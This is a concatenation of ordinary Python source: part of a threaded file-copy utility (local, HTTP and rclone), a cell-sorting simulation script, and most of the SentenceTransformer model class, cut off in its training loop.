if e.errno == errno.EEXIST and os.path.isdir(dst):
pass
else:
raise
try:
shutil.copystat(src, dst)
except OSError as e:
self.errors.extend((self.src, self.dst, str(e)))
self.totalFiles = len(self.fileList)
logger.info("Copying " + str(self.totalFiles) + " files (" + str(self.sizecounter) + " bytes)..")
self.pbar = tqdm(total=self.sizecounter, unit='B', unit_scale=True, unit_divisor=1024)
self.threadWorkerCopy(self.fileList)
def CopyWorker(self):
"""Thread worker for file copying."""
while True:
fileName = fileQueue.get()
try:
isdir = fileName.is_dir() # scandir object
issym = fileName.is_symlink()
size = fileName.stat().st_size
fname = fileName.name
except AttributeError: # file from txt
fname, fpath, size = fileName
isdir = True if os.path.isdir(fpath) else False
issym = True if os.path.islink(fpath) else False
if not self.is_package_task:
srcname = os.path.join(self.src, fname)
else:
srcname = fname
dstname = os.path.join(self.dst, fname)
try:
if isdir:
#copyf = shutil.copy2 if self.copymeta else shutil.copyfile
#shutil.copytree(srcname, dstname, symlinks=self.symlinks,
# ignore=self.ignore, copy_function=copyf)
pass
else:
if issym is self.symlinks:
if self.copymeta:
try:
shutil.copy2(srcname, dstname)
except (OSError, IOError) as e:
self.errors.extend((self.src, self.dst, str(e)))
else:
shutil.copyfile(srcname, dstname)
except (OSError, IOError) as e:
self.errors.append((srcname, dstname, str(e)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except Error as e:
self.errors.extend(e.args[0])
if self.errors:
raise Error(self.errors)
with self.lock:
self.copyCount += 1
#percent = (self.copyCount * 100) / self.totalFiles
#print(str(percent) + " percent copied.")
self.pbar.set_postfix(file=fname[-10:], refresh=False)
self.pbar.update(size)
fileQueue.task_done()
def threadWorkerCopy(self, fileNameList):
for i in range(self.threads):
t = Thread(target=self.CopyWorker)
t.daemon = True
t.start()
for fileName in fileNameList:
fileQueue.put(fileName)
fileQueue.join()
self.pbar.close()
logger.info('Done')
class ThreadedHTTPCopy:
"""Threaded HTTP file copy class."""
totalFiles = 0
copyCount = 0
lock = Lock()
def __init__(self, src, dst, threads=1, ports=[5005], fetchmode='urlretrieve', chunksize=8192):
self.src = src
self.dst = dst
self.threads = threads
self.ports = ports
self.fileList = []
self.sizecounter = 0
self.fetchmode = fetchmode # requests, urlretrieve
self.chunksize = chunksize
self.errors = []
logger.info('Starting file copy from %s to %s..' % (self.src, self.dst))
# get file list from http server
logger.info("Getting file list from http server..")
for item in tqdm(self.GetFileLinks(), unit='files'): # get file links and build file list
self.fileList.append(item)
self.sizecounter += item[1]
# make dst directory if it doesn't exist
try:
os.makedirs(dst)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(dst):
pass
else:
raise
self.totalFiles = len(self.fileList)
logger.info("Copying " + str(self.totalFiles) + " files (" + str(self.sizecounter) + " bytes)..")
self.pbar = tqdm(total=self.sizecounter, unit='B', unit_scale=True, unit_divisor=1024)
self.threadWorkerCopy(self.fileList)
def GetFileLinks(self):
"""Generator that yields tuple of file links and their size at url."""
from bs4 import BeautifulSoup
import requests
url = self.tserv_lb()
r = requests.get(url)
html = r.content
soup = BeautifulSoup(html, 'html.parser')
for link in soup.find_all('a'):
if not link.get('href').endswith('/'): # files only
yield (link.get('href'), int(link.get('title')))
def FetchFile(self, src, dst):
"""Use urllib urlretrieve to fetch file."""
try:
from urllib import urlretrieve
except ImportError:
from urllib.request import urlretrieve
import requests
if self.fetchmode == 'urlretrieve':
try:
urlretrieve(src, dst)
except Exception as e:
self.errors.append((src, dst, str(e)))
elif self.fetchmode == 'requests' or self.fetchmode is None:
try:
response = requests.get(src, stream=True)
handle = open(dst, "wb")
for chunk in response.iter_content(chunk_size=self.chunksize):
if chunk:
handle.write(chunk)
handle.close()
except Exception as e:
self.errors.append((src, dst, str(e)))
def tserv_lb(self):
"""Load balance across tserve ports."""
import random
port = random.choice(self.ports)
url = self.src + ":" + str(port)
return url
def CopyWorker(self):
"""Thread worker for file copying."""
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
while True:
fileItem = fileQueue.get()
fileName, size = fileItem
url = self.tserv_lb()
srcname = urljoin(url, fileName)
dstname = os.path.join(self.dst, fileName)
self.FetchFile(srcname, dstname)
if self.errors:
raise Error(self.errors)
with self.lock:
self.copyCount += 1
self.pbar.set_postfix(file=fileName[-10:], refresh=False)
self.pbar.update(size)
fileQueue.task_done()
def threadWorkerCopy(self, fileItemList):
for i in range(self.threads):
t = Thread(target=self.CopyWorker)
t.daemon = True
t.start()
for fileItem in fileItemList:
fileQueue.put(fileItem)
fileQueue.join()
self.pbar.close()
logger.info('Done')
class Rclone:
"""Rclone class. Uses subprocess to run rclone."""
def __init__(self, src, dst, flags=[], command='sync', cmdargs=[]):
self.src = src
self.dst = dst
self.flags = flags
self.command = command
self.cmdargs = cmdargs
self.errors = []
self.run_rclone()
def run_rclone(self):
from subprocess import check_output, CalledProcessError, STDOUT
cmd = ['rclone']
[cmd.append(f) for f in self.flags]
cmd.append(self.command)
cmd.append(self.src)
cmd.append(self.dst)
[cmd.append(a) for a in self.cmdargs]
logger.debug('rclone command: {}'.format(" ".join(cmd)))
logger.info('Starting rclone from %s to %s..' % (self.src, self.dst))
try:
output = check_output(cmd, stderr=STDOUT)
logger.debug(output)
except CalledProcessError as e:
self.errors.append((self.src, self.dst, str(e.output), str(e.returncode)))
if self.errors:
raise Error(self.errors)
logger.info('Done')
|
k_pert_average_cell_sorting.py
|
import OS_model
from numpy import random
import multiprocessing
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import rc
from numpy import genfromtxt
time_step = 0.005
end_time = 100
simulation_count = 10
times = np.linspace(0, end_time, int(end_time / time_step) + 1)
# Generate Data
def generate_data(k_pert):
file_name = str(k_pert).replace('.', '_') + 'pert_frac_length_spaced_data.txt'
f = open(file_name, 'a')
fractional_lengths = np.zeros((simulation_count, len(times)))
for i in range(simulation_count):
random.seed(i + 17)
x = OS_model.Monolayer(space=True)
x.set_k_pert(k_pert)
fractional_lengths[i] = x.measure_sorting(end_time)[1]
fractional_length_mean = np.mean(fractional_lengths, axis=0)
fractional_length_variance = np.var(fractional_lengths, axis=0)
np.savetxt(f, fractional_length_mean, fmt='%1.3f', newline=", ")
f.write("\n")
np.savetxt(f, fractional_length_variance, fmt='%1.5f', newline=", ")
f.write("\n")
f.close()
# Multiprocessing for time efficiency
if __name__ == '__main__':
jobs = []
k_pert = 45
p = multiprocessing.Process(target=generate_data, args=(k_pert,))
jobs.append(p)
p.start()
# rc('text', usetex=True)
# rc('font', family='serif')
#
# plot_every = 20 # Determines how frequently we pull data points to plot.
# plot_times = times[0::plot_every]
# #palette = ['royalblue', 'plum']
# fig, ax = plt.subplots()
# ax.grid(color='lightgray', linestyle='--', alpha=0.7)
# for index, k_pert in enumerate((0.1,1)):
# file_name = str(k_pert).replace('.', '_') + 'pert_frac_length_spaced_data.txt'
# fractional_length_data = genfromtxt(file_name, delimiter=',')
# plot_fractional_lengths = fractional_length_data[:, 0::plot_every]
# plt.plot(plot_times, plot_fractional_lengths[0], label=str(k_pert))
# std_dev = np.sqrt(plot_fractional_lengths[1])
# plt.fill_between(plot_times, plot_fractional_lengths[0] + std_dev, plot_fractional_lengths[0] - std_dev,
# alpha=0.2)
# plt.xlabel('Time')
# plt.ylabel('Fractional length')
# plt.legend(bbox_to_anchor=(1, 1, 1, 0), loc='upper left', title=r'$k_\textrm{pert}$')
# plt.show()
# # fig.savefig('file.pdf', bbox_inches='tight', )
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
import stat
from collections import OrderedDict, Counter
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable, Optional
import requests
import numpy as np
from numpy import ndarray
import transformers
from huggingface_hub import HfApi, HfFolder, Repository, hf_hub_url, cached_download
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import trange
import math
import queue
import tempfile
from distutils.dir_util import copy_tree
from . import __MODEL_HUB_ORGANIZATION__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, fullname, snapshot_download
from .models import Transformer, Pooling, Dense
from .model_card_templates import ModelCardTemplate
from . import __version__
logger = logging.getLogger(__name__)
class SentenceTransformer(nn.Sequential):
"""
Loads or create a SentenceTransformer model, that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
:param cache_folder: Path to store models
:param use_auth_token: HuggingFace authentication token to download private models.
"""
def __init__(self, model_name_or_path: Optional[str] = None,
modules: Optional[Iterable[nn.Module]] = None,
device: Optional[str] = None,
cache_folder: Optional[str] = None,
use_auth_token: Union[bool, str, None] = None
):
self._model_card_vars = {}
self._model_card_text = None
self._model_config = {}
if cache_folder is None:
cache_folder = os.getenv('SENTENCE_TRANSFORMERS_HOME')
if cache_folder is None:
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(os.getenv('TORCH_HOME', os.path.join(os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
cache_folder = os.path.join(torch_cache_home, 'sentence_transformers')
if model_name_or_path is not None and model_name_or_path != "":
logger.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
#Old models that don't belong to any organization
basic_transformer_models = ['albert-base-v1', 'albert-base-v2', 'albert-large-v1', 'albert-large-v2', 'albert-xlarge-v1', 'albert-xlarge-v2', 'albert-xxlarge-v1', 'albert-xxlarge-v2', 'bert-base-cased-finetuned-mrpc', 'bert-base-cased', 'bert-base-chinese', 'bert-base-german-cased', 'bert-base-german-dbmdz-cased', 'bert-base-german-dbmdz-uncased', 'bert-base-multilingual-cased', 'bert-base-multilingual-uncased', 'bert-base-uncased', 'bert-large-cased-whole-word-masking-finetuned-squad', 'bert-large-cased-whole-word-masking', 'bert-large-cased', 'bert-large-uncased-whole-word-masking-finetuned-squad', 'bert-large-uncased-whole-word-masking', 'bert-large-uncased', 'camembert-base', 'ctrl', 'distilbert-base-cased-distilled-squad', 'distilbert-base-cased', 'distilbert-base-german-cased', 'distilbert-base-multilingual-cased', 'distilbert-base-uncased-distilled-squad', 'distilbert-base-uncased-finetuned-sst-2-english', 'distilbert-base-uncased', 'distilgpt2', 'distilroberta-base', 'gpt2-large', 'gpt2-medium', 'gpt2-xl', 'gpt2', 'openai-gpt', 'roberta-base-openai-detector', 'roberta-base', 'roberta-large-mnli', 'roberta-large-openai-detector', 'roberta-large', 't5-11b', 't5-3b', 't5-base', 't5-large', 't5-small', 'transfo-xl-wt103', 'xlm-clm-ende-1024', 'xlm-clm-enfr-1024', 'xlm-mlm-100-1280', 'xlm-mlm-17-1280', 'xlm-mlm-en-2048', 'xlm-mlm-ende-1024', 'xlm-mlm-enfr-1024', 'xlm-mlm-enro-1024', 'xlm-mlm-tlm-xnli15-1024', 'xlm-mlm-xnli15-1024', 'xlm-roberta-base', 'xlm-roberta-large-finetuned-conll02-dutch', 'xlm-roberta-large-finetuned-conll02-spanish', 'xlm-roberta-large-finetuned-conll03-english', 'xlm-roberta-large-finetuned-conll03-german', 'xlm-roberta-large', 'xlnet-base-cased', 'xlnet-large-cased']
if os.path.exists(model_name_or_path):
#Load from path
model_path = model_name_or_path
else:
#Not a path, load from hub
if '\\' in model_name_or_path or model_name_or_path.count('/') > 1:
raise ValueError("Path {} not found".format(model_name_or_path))
if '/' not in model_name_or_path and model_name_or_path.lower() not in basic_transformer_models:
# A model from sentence-transformers
model_name_or_path = __MODEL_HUB_ORGANIZATION__ + "/" + model_name_or_path
model_path = os.path.join(cache_folder, model_name_or_path.replace("/", "_"))
# Download from hub with caching
snapshot_download(model_name_or_path,
cache_dir=cache_folder,
library_name='sentence-transformers',
library_version=__version__,
ignore_files=['flax_model.msgpack', 'rust_model.ot', 'tf_model.h5'],
use_auth_token=use_auth_token)
if os.path.exists(os.path.join(model_path, 'modules.json')): #Load as SentenceTransformer model
modules = self._load_sbert_model(model_path)
else: #Load with AutoModel
modules = self._load_auto_model(model_path)
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logger.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
device: str = None,
normalize_embeddings: bool = False) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encode sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings. Set to None, to get all output values
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param device: Which torch.device to use for the computation
:param normalize_embeddings: If set to true, returned vectors will have length 1. In that case, the faster dot-product (util.dot_score) instead of cosine similarity can be used.
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logger.getEffectiveLevel()==logging.INFO or logger.getEffectiveLevel()==logging.DEBUG)
if convert_to_tensor:
convert_to_numpy = False
if output_value != 'sentence_embedding':
convert_to_tensor = False
convert_to_numpy = False
input_was_string = False
if isinstance(sentences, str) or not hasattr(sentences, '__len__'): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([-self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
for start_index in trange(0, len(sentences), batch_size, desc="Batches", disable=not show_progress_bar):
sentences_batch = sentences_sorted[start_index:start_index+batch_size]
features = self.tokenize(sentences_batch)
features = batch_to_device(features, device)
with torch.no_grad():
out_features = self.forward(features)
if output_value == 'token_embeddings':
embeddings = []
for token_emb, attention in zip(out_features[output_value], out_features['attention_mask']):
last_mask_id = len(attention)-1
while last_mask_id > 0 and attention[last_mask_id].item() == 0:
last_mask_id -= 1
embeddings.append(token_emb[0:last_mask_id+1])
elif output_value is None: #Return all outputs
embeddings = []
for sent_idx in range(len(out_features['sentence_embedding'])):
row = {name: out_features[name][sent_idx] for name in out_features}
embeddings.append(row)
else: #Sentence embeddings
embeddings = out_features[output_value]
embeddings = embeddings.detach()
if normalize_embeddings:
embeddings = torch.nn.functional.normalize(embeddings, p=2, dim=1)
# fixes for #522 and #487 to avoid oom problems on gpu with large datasets
if convert_to_numpy:
embeddings = embeddings.cpu()
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None):
"""
Starts multi process to process the encoding with several, independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:return: Returns a dict with the target processes, an input queue and and output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logger.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], batch_size: int = 32, chunk_size: int = None):
"""
This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param batch_size: Encode sentences with batch size
:param chunk_size: Sentences are chunked and sent to the individual processes. If none, it determine a sensible size.
:return: Numpy matrix with all embeddings
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logger.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, batch_size, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, show_progress_bar=False, convert_to_numpy=True, batch_size=batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length for input the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, texts: Union[List[str], List[Dict], List[Tuple[str, str]]]):
"""
Tokenizes the texts
"""
return self._first_module().tokenize(texts)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
for mod in reversed(self._modules.values()):
sent_embedding_dim_method = getattr(mod, "get_sentence_embedding_dimension", None)
if callable(sent_embedding_dim_method):
return sent_embedding_dim_method()
return None
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path: str, model_name: Optional[str] = None, create_model_card: bool = True):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
:param path: Path on disc
:param model_name: Optional model name
:param create_model_card: If True, create a README.md with basic information about this model
"""
if path is None:
return
os.makedirs(path, exist_ok=True)
logger.info("Save model to {}".format(path))
modules_config = []
#Save some model info
if '__version__' not in self._model_config:
self._model_config['__version__'] = {
'sentence_transformers': __version__,
'transformers': transformers.__version__,
'pytorch': torch.__version__,
}
with open(os.path.join(path, 'config_sentence_transformers.json'), 'w') as fOut:
json.dump(self._model_config, fOut, indent=2)
#Save modules
for idx, name in enumerate(self._modules):
module = self._modules[name]
if idx == 0 and isinstance(module, Transformer): #Save transformer model in the main folder
model_path = path + "/"
else:
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
modules_config.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(modules_config, fOut, indent=2)
# Create model card
if create_model_card:
self._create_model_card(path, model_name)
def _create_model_card(self, path: str, model_name: Optional[str] = None):
"""
Create an automatic model and stores it in path
"""
if self._model_card_text is not None and len(self._model_card_text) > 0:
model_card = self._model_card_text
else:
tags = ModelCardTemplate.__TAGS__.copy()
model_card = ModelCardTemplate.__MODEL_CARD__
if len(self._modules) == 2 and isinstance(self._first_module(), Transformer) and isinstance(self._last_module(), Pooling) and self._last_module().get_pooling_mode_str() in ['cls', 'max', 'mean']:
pooling_module = self._last_module()
pooling_mode = pooling_module.get_pooling_mode_str()
model_card = model_card.replace("{USAGE_TRANSFORMERS_SECTION}", ModelCardTemplate.__USAGE_TRANSFORMERS__)
pooling_fct_name, pooling_fct = ModelCardTemplate.model_card_get_pooling_function(pooling_mode)
model_card = model_card.replace("{POOLING_FUNCTION}", pooling_fct).replace("{POOLING_FUNCTION_NAME}", pooling_fct_name).replace("{POOLING_MODE}", pooling_mode)
tags.append('transformers')
# Print full model
model_card = model_card.replace("{FULL_MODEL_STR}", str(self))
# Add tags
model_card = model_card.replace("{TAGS}", "\n".join(["- "+t for t in tags]))
# Add dim info
self._model_card_vars["{NUM_DIMENSIONS}"] = self.get_sentence_embedding_dimension()
# Replace vars we created while using the model
for name, value in self._model_card_vars.items():
model_card = model_card.replace(name, str(value))
# Replace remaining vars with default values
for name, value in ModelCardTemplate.__DEFAULT_VARS__.items():
model_card = model_card.replace(name, str(value))
if model_name is not None:
model_card = model_card.replace("{MODEL_NAME}", model_name.strip())
with open(os.path.join(path, "README.md"), "w", encoding='utf8') as fOut:
fOut.write(model_card.strip())
def save_to_hub(self,
repo_name: str,
organization: Optional[str] = None,
private: Optional[bool] = None,
commit_message: str = "Add new SentenceTransformer model.",
local_model_path: Optional[str] = None,
exist_ok: bool = False,
replace_model_card: bool = False):
"""
Uploads all elements of this Sentence Transformer to a new HuggingFace Hub repository.
:param repo_name: Repository name for your model in the Hub.
:param organization: Organization in which you want to push your model or tokenizer (you must be a member of this organization).
:param private: Set to true, for hosting a prive model
:param commit_message: Message to commit while pushing.
:param local_model_path: Path of the model locally. If set, this file path will be uploaded. Otherwise, the current model will be uploaded
:param exist_ok: If true, saving to an existing repository is OK. If false, saving only to a new repository is possible
:param replace_model_card: If true, replace an existing model card in the hub with the automatically created model card
:return: The url of the commit of your model in the given repository.
"""
token = HfFolder.get_token()
if token is None:
raise ValueError("You must login to the Hugging Face hub on this computer by typing `transformers-cli login`.")
if '/' in repo_name:
splits = repo_name.split('/', maxsplit=1)
if organization is None or organization == splits[0]:
organization = splits[0]
repo_name = splits[1]
else:
raise ValueError("You passed and invalid repository name: {}.".format(repo_name))
endpoint = "https://huggingface.co"
repo_url = HfApi(endpoint=endpoint).create_repo(
token,
repo_name,
organization=organization,
private=private,
repo_type=None,
exist_ok=exist_ok,
)
full_model_name = repo_url[len(endpoint)+1:].strip("/")
with tempfile.TemporaryDirectory() as tmp_dir:
# First create the repo (and clone its content if it's nonempty).
logging.info("Create repository and clone it if it exists")
repo = Repository(tmp_dir, clone_from=repo_url)
# If user provides local files, copy them.
if local_model_path:
copy_tree(local_model_path, tmp_dir)
else: # Else, save model directly into local repo.
create_model_card = replace_model_card or not os.path.exists(os.path.join(tmp_dir, 'README.md'))
self.save(tmp_dir, model_name=full_model_name, create_model_card=create_model_card)
#Find files larger 5M and track with git-lfs
large_files = []
for root, dirs, files in os.walk(tmp_dir):
for filename in files:
file_path = os.path.join(root, filename)
rel_path = os.path.relpath(file_path, tmp_dir)
if os.path.getsize(file_path) > (5 * 1024 * 1024):
large_files.append(rel_path)
if len(large_files) > 0:
logging.info("Track files with git lfs: {}".format(", ".join(large_files)))
repo.lfs_track(large_files)
logging.info("Push model to the hub. This might take a while")
push_return = repo.push_to_hub(commit_message=commit_message)
def on_rm_error(func, path, exc_info):
# path contains the path of the file that couldn't be removed
# let's just assume that it's read-only and unlink it.
try:
os.chmod(path, stat.S_IWRITE)
os.unlink(path)
except:
pass
# Remove .git folder. On Windows, the .git folder might be read-only and cannot be deleted
# Hence, try to set write permissions on error
try:
for f in os.listdir(tmp_dir):
shutil.rmtree(os.path.join(tmp_dir, f), onerror=on_rm_error)
except Exception as e:
logging.warning("Error when deleting temp folder: {}".format(str(e)))
pass
return push_return
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0].texts)
texts = [[] for _ in range(num_texts)]
labels = []
for example in batch:
for idx, text in enumerate(example.texts):
texts[idx].append(text)
labels.append(example.label)
labels = torch.tensor(labels).to(self._target_device)
sentence_features = []
for idx in range(num_texts):
tokenized = self.tokenize(texts[idx])
batch_to_device(tokenized, self._target_device)
sentence_features.append(tokenized)
return sentence_features, labels
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
Help function to get the length for the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of list of ints
(representing several text inputs to the model).
"""
if isinstance(text, dict): #{key: value} case
return len(next(iter(text.values())))
elif not hasattr(text, '__len__'): #Object has no len() method
return 1
elif len(text) == 0 or isinstance(text[0], int): #Empty string or list of ints
return len(text)
else:
return sum([len(t) for t in text]) #Sum of length of individual strings
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator = None,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
show_progress_bar: bool = True,
print_steps: int = 100,
checkpoint_path: str = None,
checkpoint_save_steps: int = 500,
checkpoint_save_total_limit: int = 0
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from o up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
:param show_progress_bar: If True, output a tqdm progress bar
:param checkpoint_path: Folder to save checkpoints during training
:param checkpoint_save_steps: Will save a checkpoint after so many steps
:param checkpoint_save_total_limit: Total number of checkpoints to store
"""
##Add info to model card
#info_loss_functions = "\n".join(["- {} with {} training examples".format(str(loss), len(dataloader)) for dataloader, loss in train_objectives])
info_loss_functions = []
for dataloader, loss in train_objectives:
info_loss_functions.extend(ModelCardTemplate.get_train_objective_info(dataloader, loss))
info_loss_functions = "\n\n".join([text for text in info_loss_functions])
info_fit_parameters = json.dumps({"evaluator": fullname(evaluator), "epochs": epochs, "steps_per_epoch": steps_per_epoch, "scheduler": scheduler, "warmup_steps": warmup_steps, "optimizer_class": str(optimizer_class), "optimizer_params": optimizer_params, "weight_decay": weight_decay, "evaluation_steps": evaluation_steps, "max_grad_norm": max_grad_norm }, indent=4, sort_keys=True)
self._model_card_text = None
self._model_card_vars['{TRAINING_SECTION}'] = ModelCardTemplate.__TRAINING_SECTION__.replace("{LOSS_FUNCTIONS}", info_loss_functions).replace("{FIT_PARAMETERS}", info_fit_parameters)
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch", disable=not show_progress_bar):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
running_loss = 0
total = 0
label_count = Counter()
for i in trange(steps_per_epoch, desc="Iteration", smoothing=0.05, disable=not show_progress_bar):
for train_idx in range(num_train_objectives):
